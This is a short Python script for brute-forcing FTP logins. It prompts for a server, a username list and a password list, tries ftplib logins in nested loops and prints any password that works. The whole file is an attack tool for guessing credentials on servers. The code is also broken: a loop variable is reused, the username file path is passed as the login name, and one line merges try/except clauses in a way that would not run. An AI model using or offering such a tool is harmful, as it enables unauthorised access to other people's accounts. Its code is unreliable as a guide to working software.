#! /usr/bin/python3

import ftplib

server = input("FTP Server: ")

user = input("Path to Username List >  ")

Passwordlist = input ("Path to Password List > ")

try:

	with open(user, 'r') as ur:
		for word in ur:
			word = word.strip ('\r').strip('\n')
			try:

				with open(Passwordlist, 'r') as pw:
					for word in pw:
						word = word.strip ('\r').strip('\n')
						try:
							ftp = ftplib.FTP(server)
							ftp.login(user, word)
							print('Success! The password is ' + word)						except:							print('still trying…')
			except:
				print('trying different username')
except:
	print ('Wordlist error')